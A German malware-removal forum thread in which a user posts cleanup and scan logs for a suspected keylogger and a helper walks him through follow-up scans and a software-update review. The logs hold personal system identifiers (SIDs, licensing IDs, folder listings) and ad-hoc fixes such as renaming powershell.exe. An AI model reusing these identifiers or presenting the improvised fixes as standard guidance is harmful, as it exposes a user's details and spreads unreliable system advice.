========= dir /A "C:\Users\user.domäne" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 2448-20ZA
Verzeichnis von C:\Users\user.domäne
25.03.2024 01:57 <DIR> .
04.11.2022 06:15 <DIR> ..
11.03.2023 09:04 <DIR> .android
11.03.2023 09:03 <DIR> .BigNox
05.08.2022 12:32 <DIR> .cache
07.07.2023 09:05 <DIR> .dotnet
26.10.2022 17:15 <DIR> .dropbox_bi
22.02.2023 15:04 <DIR> .freemind
26.04.2023 22:49 <DIR> .junique
30.06.2022 16:30 <DIR> .ms-ad
16.01.2024 19:56 <DIR> .openshot_qt
02.02.2022 16:50 <DIR> .platformio
19.05.2022 15:44 <DIR> .ssh
12.03.2021 18:33 <DIR> .swt
12.07.2023 19:53 <DIR> .thumbnails
02.02.2022 16:11 <DIR> .vscode
12.02.2022 09:45 <DIR> 3D Objects
04.11.2022 06:15 <JUNCTION> Anwendungsdaten [C:\Users\user.domäne\AppData\Roaming]
04.11.2022 06:27 <DIR> AppData
17.02.2024 21:24 <DIR> Bluetooth
04.11.2022 06:31 <DIR> Contacts
04.11.2022 06:15 <JUNCTION> Cookies [C:\Users\user.domäne\AppData\Local\Microsoft\Windows\INetCookies]
11.03.2023 09:04 297 d4ac4633ebd6440fa397b84f1bc94a3c.7z
24.03.2024 23:05 <DIR> Desktop
14.02.2022 14:08 <DIR> diylc
03.02.2021 12:32 <DIR> Documents
16.01.2024 19:55 <DIR> Downloads
04.11.2022 06:15 <JUNCTION> Druckumgebung [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Printer Shortcuts]
27.06.2021 22:45 <DIR> dwhelper
04.11.2022 06:15 <JUNCTION> Eigene Dateien [C:\Users\user.domäne\Documents]
25.05.2022 16:23 <DIR> eTeks
04.11.2022 06:31 <DIR> Favorites
14.07.2022 13:22 66 inittk.ini
14.07.2022 13:22 41 inst.ini
04.11.2022 06:40 <DIR> Links
09.01.2022 19:44 <DIR> Local Settings
04.11.2022 06:15 <JUNCTION> Lokale Einstellungen [C:\Users\user.domäne\AppData\Local]
04.11.2022 06:15 <JUNCTION> Netzwerkumgebung [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Network Shortcuts]
14.07.2022 13:22 <DIR> Nox_share
25.03.2024 06:01 14.417.920 NTUSER.DAT
04.11.2022 06:15 3.145.728 ntuser.dat.LOG1
04.11.2022 06:15 3.613.696 ntuser.dat.LOG2
04.11.2022 06:15 65.536 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TM.blf
04.11.2022 06:15 524.288 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TMContainer00000000000000000001.regtrans-ms
04.11.2022 06:15 524.288 NTUSER.DAT{85a19e94-5bff-11ed-9565-005056c00008}.TMContainer00000000000000000002.regtrans-ms
04.11.2022 06:30 20 ntuser.ini
14.07.2022 13:22 45 nuuid.ini
02.02.2021 16:34 <DIR> OneDrive
04.11.2022 06:15 <JUNCTION> Recent [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Recent]
02.08.2022 14:21 485 sanetwain.ini
04.11.2022 06:40 <DIR> Saved Games
04.11.2022 06:31 <DIR> Searches
04.11.2022 06:15 <JUNCTION> SendTo [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\SendTo]
01.01.2024 02:02 <DIR> Shutter Encoder
04.11.2022 06:15 <JUNCTION> Startmenü [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Start Menu]
06.02.2021 11:08 0 Sti_Trace.log
24.03.2024 21:57 <DIR> temp
02.01.2023 12:48 <DIR> usb_driver
14.07.2022 13:22 53 useruid.ini
11.03.2023 09:03 <DIR> vmlogs
04.11.2022 06:15 <JUNCTION> Vorlagen [C:\Users\user.domäne\AppData\Roaming\Microsoft\Windows\Templates]
14 Datei(en), 22.292.463 Bytes
47 Verzeichnis(se), 76.498.915.328 Bytes frei
========= Ende von CMD: =========
========= cscript /nologo %systemroot%\System32\slmgr.vbs /dlv =========
Softwarelizenzierungsdienst-Version: 10.0.22621.3296
Name: Windows(R), Professional edition
Beschreibung: Windows(R) Operating System, VOLUME_MAK channel
Aktivierungs-ID: 39cd895b-53b2-4dc4-a5f7-b18aa019ad33
Anwendungs-ID: 35c92734-d682-4d71-983e-d6ec3f160593
Erweiterte PID: 33612-03312-009-000000-03-1031-22621.0000-3082023
Product Key-Kanal: Volume:MAK
Installations-ID: 336413596693231515860949518456516963754392973443279943039248803
Lizenz-URL verwenden: https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
URL fr die šberprfung: https://validation-v2.sls.microsoft.com/SLWGA/slwga.asmx
Teil-Product Key: AD49M
Lizenzstatus: Lizenziert
Verbleibende Windows Rearm-Anzahl: 1001
Verbleibende SKU Rearm-Anzahl: 1001
Vertrauenswrdige Zeit: 25.03.2024 15:47:58
========= Ende von CMD: =========
========= netsh winsock reset =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
========= netsh advfirewall reset =========
OK.
========= Ende von CMD: =========
========= netsh advfirewall set allprofiles state ON =========
OK.
========= Ende von CMD: =========
========= netsh winhttp reset proxy =========
Aktuelle WinHTTP-Proxyeinstellungen:
DirectAccess (kein Proxyserver).
========= Ende von CMD: =========
========= Bitsadmin /Reset /Allusers =========
BITSADMIN version 3.0
BITS administration utility.
(C) Copyright Microsoft Corp.
0 out of 0 jobs canceled.
========= Ende von CMD: =========
========= Winmgmt /salvagerepository =========
Das WMI-Repository ist konsistent.
========= Ende von CMD: =========
========= Winmgmt /verifyrepository =========
Das WMI-Repository ist konsistent.
========= Ende von CMD: =========
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SYSTEM32\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
========= "%WINDIR%\SysWOW64\lodctr.exe" /R =========
Info: Die Leistungsindikatoreinstellung konnte erfolgreich aus dem Systemsicherungsspeicher neu erstellt werden.
========= Ende von CMD: =========
C:\Windows\System32\Drivers\etc\hosts => erfolgreich verschoben
Hosts erfolgreich wiederhergestellt.
========= RemoveProxy: =========
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-3460856420-2582145234-728948223-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-3460856420-2582145234-728948223-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => erfolgreich entfernt
"HKU\S-1-5-21-4143643995-367336108-808576433-1107\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => erfolgreich entfernt
========= Ende von RemoveProxy: =========
=========== EmptyTemp: ==========
FlushDNS => abgeschlossen
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 36625154 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 4600 B
Windows/system/drivers => 15691358 B
Edge => 0 B
Chrome => 990911811 B
Firefox => 18724273 B
Opera => 13633904 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 0 B
Thomas => 23186 B
user.domäne => 77675088 B
DefaultAppPool => 77675088 B
RecycleBin => 0 B
EmptyTemp: => 1.1 GB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 15:48:27 ====
In der Nacht ist mir noch aufgefallen, dass die Firewall fast 20.000 versuche blockiert hat. Immer zur gleichen URL: hxxp://5.189.183.113/Screenshot2024-03-25151555.png hxxp://5.189.183.113/Screenshot2024-03-25151655.png Geändert von dslthomas (25.03.2024 um 16:52 Uhr) |
|
25.03.2024, 17:51
| #5 |
| /// TB-Ausbilder | Keylogger am Werk? Vielen Dank für die Logdatei und den Nachtrag. Du hast ja einiges schon selbst entfernt gehabt. Meldet die Firewall nun (nach dem Fix) immer noch das Blockieren von Seiten? Bitte lösche diesen Schlüssel (der scheint auch von der Malware zu stammen): HKEY_CURRENT_USER\Software\B0A95C82BA6D3B5A9F4A Ich würde nun zwei Kontrollen mit MBAM und ESET vorschlagen. Schritt 1 Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Schritt 2 Führe ESET Online Scanner (EOS) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. |
|
26.03.2024, 05:53
| #6 |
| | Keylogger am Werk? Moin, Moin, so,- fertig.... Eset hat sehr lange gedauert, aber beide Scans sind jetzt fertig. Hier das Log von MB: Code:
ATTFilter Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 26.03.2024
Scan-Zeit: 05:27
Protokolldatei: 2a906ddc-eb29-11ee-ae97-00090faa0001.json
-Softwaredaten-
Version: 5.1.0.102
Komponentenversion: 1.0.1179
Version des Aktualisierungspakets: 1.0.82622
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 11 (Build 22621.3296)
CPU: x64
Dateisystem: NTFS
Benutzer: DT\thomas
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 391334
Erkannte Bedrohungen: 2
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 13 Min., 34 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)
Registrierungswert: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 0
(keine bösartigen Elemente erkannt)
Datei: 2
PUP.Optional.StartFenster, C:\USERS\user.domäne\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Keine Aktion durch Benutzer, 5139, 455286, 1.0.82622, , ame, , 99FEDE3F119241087B7A7B2525847AEC, 4170368185AB13F7EAD54F15C12C9D98A0606B13F502CC2E3491DF3245DD5478
PUP.Optional.StartFenster, C:\USERS\user.domäne\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Web Data, Keine Aktion durch Benutzer, 5139, 455286, 1.0.82622, , ame, , 99FEDE3F119241087B7A7B2525847AEC, 4170368185AB13F7EAD54F15C12C9D98A0606B13F502CC2E3491DF3245DD5478
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end)
Code:
ATTFilter 26.03.2024 05:11:29
Geprüfte Dateien: 2249061
Erkannte Dateien: 1
Gesäuberte Dateien: 1
Scandauer gesamt 02:20:33
Scanstatus: Abgeschlossen
D:\Documents\Server\04.03.2013\xyz.de\cgi-bin\.2918.php.böse PHP/Small.NAQ trojan cleaned by deleting
In der Firewall sind keine ungewöhnlichen Ereignisse mehr verzeichnet. Ich glaube, es war eine gute Idee,- sofort die c:\Windows\System32\WindowsPowerShelll\v1.0\powershell.exe umzubenennen. Es waren locker 10 Prozesse der Powershell im Taskmanager zu sehen. Die hatte ich gekillt und es entstanden eigentlich schnell wieder neue Prozesse. Daher hatte ich die Powershell.exe umbenannt und damit konnte ich mit allen Möglichen Tools den Rechner überhaupt erst einmal scannen und untersuchen. Es scheint aber jetzt wirklich alles weg zu sein. Ich verbäuge mich zutiefst und Bedanke mich für die Unterstützung!!!! |
|
26.03.2024, 09:29
| #7 |
| /// TB-Ausbilder | Keylogger am Werk? Vielen Dank für die Rückmeldung.  Die Funde von MBAM hast du auch entfernen lassen, oder? In der Logdatei steht nämlich "Keine Aktion durch Benutzer". Zum Abschluss würde ich gerne eine Kontrolle mit FRST und SecurityCheck ausführen. Ich hoffe, das ist ok für dich. Schritt 1
Schritt 2 Führe SecurityCheck (SC) gemäß der bebilderten Anleitung aus und füge die Logdatei als Anhang hinzu. |
|
26.03.2024, 11:07
| #8 | |
| | Keylogger am Werk?Zitat:
 ABER.... ich konnte alle aus dem Verlauf wiederherstellen  Hier die gewünschten Logs FIRST.txt: hxxp://5.189.183.113/FIRST-neu.txt Addition.txt: hxxp://5.189.183.113/Addition-neu.txt Securitycheck.txt: hxxp://5.189.183.113/securitycheck.txt |
|
26.03.2024, 16:44
| #9 |
| /// TB-Ausbilder | Keylogger am Werk? Vielen Dank für die neuen Logdateien. Wie du der Logdatei von SecurityCheck wohl schon entnommen hast, ist deine Softwarepflege mangelhaft (Note 5).   Du solltest die Software deinstallieren und sofern noch benötigt die aktuellste Version installieren. Ich kopiere für dich mal alles hier rein: The elevation prompt for administrators disabled ^It is recommended to enable (default): Win+R typing UserAccountControlSettings and Enter^ Malwarebytes version 5.1.0.102 v.5.1.0.102 Warning! Download Update Notepad++ (64-bit x64) v.8.6.2 Warning! Download Update PuTTY release 0.78 (64-bit) v.0.78.0.0 Warning! Download Update VMware Workstation v.16.2.3 Warning! Download Update WinSCP v.1.0 Warning! Download Update Microsoft Visual Studio Code (User) v.1.80.0 Warning! Download Update VeraCrypt v.1.25.9 Warning! Download Update Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.34.31931 v.14.34.31931.0 Warning! Download Update Microsoft Office 2007 Service Pack 3 (SP3) Warning! This software is no longer supported. Please use latest Microsift Office, Office Online or LibreOffice Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.34.31931 v.14.34.31931.0 Warning! Download Update 7-Zip 21.01 alpha (x64) v.21.01 alpha Warning! Download Update GIMP 2.10.32-1 v.2.10.32 Warning! Download Update Signal 6.10.1 v.6.10.1 Warning! Download Update Microsoft Teams v.1.6.00.27573 Warning! Download Update Telegram Desktop v.4.14.13 Warning! Download Update Vuze v.5.7.7.0 Warning! Ad-supported P2P-client. Java(TM) 6 Update 45 (64-bit) v.6.0.450 Warning! This software is no longer supported. Please uninstall it and use Java SE 8 (jre-8u401-windows-x64.exe). Java(TM) SE Development Kit 6 Update 45 (64-bit) v.1.6.0.450 Warning! This software is no longer supported. Please uninstall it and use Java SE Development Kit (jdk-21_windows-x64_bin.exe). Opera Stable 108.0.5067.29 v.108.0.5067.29 Warning! Download Update Microsoft Edge v.122.0.2365.92 Warning! Download Update CCleaner v.6.22 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program. VdhCoApp 1.6.3 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering. Bonjour v.3.0.0.10 Warning! Application is distributed through the partnership programs and bundle assemblies. Uninstallation recommended. Possible you became a victim of fraud or social engineering. cyberJack DriverPackage 1.3.1 v.1.3.1 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program. Zapptales Whatsapp 2.0.8 v.2.0.8 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!! JDownloader 2 v.2.0 Warning! Suspected Adware! If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware and Malwarebytes AdwCleaner. Before uninstallation and scanning it is necessary to consult in the forum where cure is provided for you!!! CCleaner 6.21.0.10918 v.6.21.0.10918 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program. Ashampoo WinOptimizer 25 v.25.00.18 Warning! Suspected demo version of anti-spyware, driver updater or optimizer. If this program is not familiar to you it is recommended to uninstall it and execute PC scanning using Malwarebytes Anti-Malware. Possible you became a victim of fraud or social engineering. Computer experts no longer recommend this program. Entfernung der verwendeten Tools Führe KpRm gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei. Dann wären wir durch! Wenn du keine Probleme mehr mit Malware hast, dann sind wir hier fertig. Deine Logdateien sind sauber. Wenn Du möchtest, kannst Du hier sagen, ob du mit mir und meiner Hilfe zufrieden warst...  Vielleicht möchtest du das Forum mit einer kleinen Spende  unterstützen.  Zum Schluss bitte unbedingt die Sicherheitsmaßnahmen lesen und umsetzen: Hinweis: Bitte gib mir eine kurze Rückmeldung, sobald du die oben verlinkten Informationen gelesen hast, alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann. |
|
26.03.2024, 19:31
| #10 | |
| | Keylogger am Werk?Zitat:
 The elevation prompt for administrators disabled Die liebe UAC ... ich tue mal einfach so, als wäre das deaktivieren normal :-) .. gehen wir pfeifend zu den nächsten Punkten .... Microsoft Edge v.122.0.2365.92 Warning! false positiv ... ich habe die aktuellste Version Opera Stable 108.0.5067.29 v.108.0.5067.29 Warning! false positiv ... ich habe die aktuellste Version Java(TM) 6 Update 45 & Java(TM) SE Development Kit 6 Update 45 Die Versionen brauche ich leider. Wenn es nach mir ginge, hätte ich gar kein Java auf meinem Rechner. Diverse HP-Switche auf Arbeit und ILO´s setzen noch auf Java und hier funktioniert der Zugriff nur mit dieser völlig veralteten Java-Version. Vuze v.5.7.7.0 Warning! Das werde ich löschen. Es war nur ganz nützlich, weil diverse OpenSouce-Software auch auf diesem Weg downloadbar ist. Jetzt ist meine Internetanbindung schnell genug, sodass ich den direkten Weg gehen kann und nichts benötige, wo ich den Download einschränken kann. Telegram Desktop v.4.14.13 Warning! Habe ich soeben geupdatet Telegram Desktop v.4.14.13 Warning! Habe ich eben geupdatet Signal 6.10.1 v.6.10.1 Warning! Habe ich eben geupdatet 7-Zip 21.01 alpha (x64) v.21.01 alpha Warning! & GIMP 2.10.32-1 v.2.10.32 Warning! Jep,- muss ich die Tage machen. Ich muss aber ein Paket für die automatische Softwareverteilung in der Firma schnüren und es erst an meinem Rechner testen. Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.34.31931 v.14.34.31931.0 Warning! eben geupdatet Microsoft Office 2007 Service Pack 3 (SP3) Warning! Ja, ist EOL und ich habe ja auch ein aktuelleres Office installiert. Ich benötige aber aus dem 2007er Office das OCR-Modul was es nur bis zu dieser Version gab. Mehr habe ich aus diesem Office-Paket auch nicht installiert. VeraCrypt v.1.25.9 Warning! geupdatet Microsoft Visual Studio Code (User) v.1.80.0 Warning! geupdatet WinSCP v.1.0 Warning! false positiv ... Wie auch immer der auf diese Version kommt. Ich habe die aktuellste Version 6.3.2 installiert. Ich habe den SecurityCheck eben noch einmal durchlaufen lassen,- es bleibt bei der falschen Versionierung. Installiert ist die aktuellste Version VMware Workstation v.16.2.3 Warning! Jep,- ist mir bekannt,- da muss ich die aktuellste Version über den Arbeitgeber beziehen. PuTTY release 0.78 (64-bit) v.0.78.0.0 Warning! Jep,- eben aktualisiert Notepad++ (64-bit x64) v.8.6.2 Warning! Wurde eben geupdatet Malwarebytes version 5.1.0.102 v.5.1.0.102 Warning! false positiv ... hmmm... habe ich doch erst vorgestern installiert und er sagt auch, dass ich die aktuellste Version habe. Das restliche Gedöns habe ich deinstalliert. CCleaner, Ashampoo und Malwarebytes lasse ich noch ein paar Tage und deinstalliere sie dann. Eine Bewertung gebe ich gleich ab und eine Spende ist eben via PayPal raus gegangen. ABER Ich habe gestern schon nach einer Möglichkeit gesucht, zu spenden. Entweder bin ich zu doof oder das ist wirklich zu versteckt platziert. Das solltet ihr wie ein Impressum, von jeder Seite aus zugänglich platzieren. |
|
27.03.2024, 11:10
| #11 |
| /// TB-Ausbilder | Keylogger am Werk? Vielen Dank für dein ausführliches Feedback.  Ja, ich weiß, die Meldungen von SecurityCheck sind nicht immer richtig.  Ich bin zufrieden... Note 3. Setzen!  Alle Infos zu Spenden findest du hier... es gibt nur die Möglichkeiten via PayPal oder Überweisung. |
|
27.03.2024, 22:28
| #12 |
| /// TB-Ausbilder | Keylogger am Werk? Vielen Dank für die Spende. Sie dient zur Erhaltung des Forums. Wir sind froh, dass wir helfen konnten  Dieses Thema scheint erledigt und wird aus unseren Abos gelöscht. Solltest Du das Thema erneut brauchen, schicke uns bitte eine Erinnerung inklusive Link zum Thema. Jeder andere bitte hier klicken und ein eigenes Thema erstellen. |
|
| Themen zu Keylogger am Werk? |
| appdata, auswerten, code, erstellt, explorer, gen, google, hex, hijack, keylogger, microsoft, netzwerk, neuer, neues, opera, problem, roaming, software, suche, system, system32, tab, version, win32, windows |
Lesestoff:
Linear-Darstellung
